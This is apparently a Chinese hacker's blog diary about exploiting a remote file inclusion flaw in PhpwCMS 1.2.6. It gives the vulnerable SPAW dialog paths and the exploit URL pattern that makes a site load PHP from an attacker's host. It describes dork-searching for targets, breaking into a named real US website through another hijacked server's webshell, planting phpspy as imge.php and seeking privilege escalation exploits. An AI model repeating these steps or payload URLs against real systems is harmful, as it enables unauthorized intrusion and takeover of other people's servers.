一、看見(jiàn)漏洞公告 　　最近想學(xué)習(xí)一下文件包含漏洞，在無(wú)意中看見(jiàn)了關(guān)于文件包含的漏洞公告。大致的意思是這樣的，PhpwCMS 1.2.6系統(tǒng)的下列文件存在文件包含漏洞：include/inc_ext/spaw/dialogs/table.php 　　include/inc_ext/spaw/dialogs/a.php 　　include/inc_ext/spaw/dialogs/colorpicker.php 　　include/inc_ext/spaw/dialogs/confirm.php 　　include/inc_ext/spaw/dialogs/img.php 　　include/inc_ext/spaw/dialogs/img_library.php 　　include/inc_ext/spaw/dialogs/td.php 　　文件中的$spaw_root的沒(méi)有過(guò)濾的情況下，包含'**class/lang.class.php'。具體的代碼公告中沒(méi)給出來(lái)?？梢岳孟旅娴膗rl利用此漏洞，http://website1/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://website2/，其中website1是有漏洞的網(wǎng)站，website2是攻擊的網(wǎng)站，website2所在的目錄下有class/lang.class.php文件。 　　二、學(xué)習(xí)的第一天 　　馬上行動(dòng)，我用google搜索inurl:"phpwcms/index.php?id="，搜索到54,800多項(xiàng)結(jié)果，基本上都是國(guó)外的。看來(lái)這次發(fā)了，這次國(guó)外的wenshell肯定是一大堆了。呵呵……，嘿嘿……隨便點(diǎn)擊一個(gè)網(wǎng)站，是美國(guó)的：http://arena-sv.jans-webdesign.com，不知道這個(gè)網(wǎng)站有沒(méi)有漏洞。我用http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.baidu.com/檢測(cè)，當(dāng)然http://www.baidu.com/class/lang.class.php是不存在的，這時(shí)頁(yè)面顯示如圖一所示，提示沒(méi)有找到頁(yè)面。這表明了這個(gè)網(wǎng)站存在文件包含漏洞，象這樣的有漏洞的網(wǎng)站隨便點(diǎn)擊一個(gè)就是。 　　檢測(cè)出有文件包含漏洞 　　現(xiàn)在開(kāi)始利用這個(gè)漏洞，在我的支持asp網(wǎng)站根目錄建一個(gè)class的目錄，在class里面建lang.class.php文件。但是當(dāng)我用瀏覽器瀏覽http://www.xxxx.xx/class/lang.class.php的時(shí)候，提示找不到文件。難道是我的網(wǎng)站所在的服務(wù)器沒(méi)設(shè)置好嗎?我試著找到了幾個(gè)webshell，瀏覽的時(shí)候還是出現(xiàn)找不到文件的問(wèn)題。 　　郁悶啊……如果能建一個(gè)txt文件代替class/lang.class.php 多好啊。我問(wèn)了我們工作組的學(xué)linux的同學(xué)，他們說(shuō)可以用問(wèn)號(hào)優(yōu)化。但是偶不會(huì)啊，聽(tīng)上去很復(fù)雜的，等明天再來(lái)做吧，休息，休息。 　三、學(xué)習(xí)的第二天
　　去搜索的發(fā)現(xiàn)有漏洞的網(wǎng)站變得比較少了，大部分的網(wǎng)站都被漏洞補(bǔ)了，還有一部分美國(guó)的網(wǎng)站上被掛了一些與反戰(zhàn)爭(zhēng)有關(guān)的圖片或者一些國(guó)旗。還好的是昨天的哪個(gè)網(wǎng)站沒(méi)有被人家黑掉，還有機(jī)會(huì)學(xué)習(xí)。我在無(wú)意中得到了jsp的wenshell，試著寫(xiě)了一個(gè)php文件，在瀏覽器瀏覽的時(shí)候出現(xiàn)的是源文件?？磥?lái)現(xiàn)在現(xiàn)在可以利用這個(gè)jsp的webshell來(lái)作跳板。 　　在webshell里面建一個(gè)class的文件夾，然后在class目錄里面上傳一個(gè)lang.class.php空文件，在文件里面寫(xiě)上.在瀏覽器上瀏覽http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/class/lang.class.php, 顯示的就是, 然后提交http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/,/是/的意思。 　　php環(huán)境信息 　　編輯lang.class.php的文件，先寫(xiě)了一個(gè)phpspy。但是登陸webshell的后，頁(yè)面轉(zhuǎn)到其他的頁(yè)面。還是先傳一可以上傳的文件的馬兒吧，傳了一個(gè)國(guó)外的php木馬，木馬的功能很的大，瀏覽http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/。 　　包含的國(guó)外php木馬 　　但是這個(gè)國(guó)外的php馬還是上傳一個(gè)經(jīng)過(guò)修改的phpspy吧，用著舒服一點(diǎn)，上傳得文件改為了imge.php，現(xiàn)在訪問(wèn)http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/imge.php?cuit=6305，登陸后一臺(tái)webshell就在我們的眼前了。權(quán)限也不錯(cuò)，但是由于是linux系統(tǒng)，也不知道怎么去提權(quán)，還是再放一下吧! 　　phpspy上傳成功 　　四、學(xué)習(xí)的第三天 　　對(duì)linux下的提權(quán)一點(diǎn)都不了解，沒(méi)辦法只有尋求幫助了。Jinsdb師兄叫我去一些好的網(wǎng)站找一下exp看看，他還告訴我了上次在我的網(wǎng)站中的php文件瀏覽的時(shí)候是找不到文件的原因：因?yàn)槲业南到y(tǒng)是2003的，所以要在IIS的ISAPI 篩選器中加.php后綴,在xp下訪問(wèn)php文件直接就可以瀏覽。看來(lái)上次我得到的服務(wù)器基本上是2003的。 　　看來(lái)這次的學(xué)習(xí)也蠻有意義的!發(fā)現(xiàn)一點(diǎn)，國(guó)外的網(wǎng)站的管理人員比較重視安全。在出現(xiàn)漏洞的第二天，很多網(wǎng)站都把漏洞補(bǔ)了，還有的網(wǎng)站被入侵后能馬上發(fā)現(xiàn)，并及時(shí)清除了webshell。

最新評(píng)論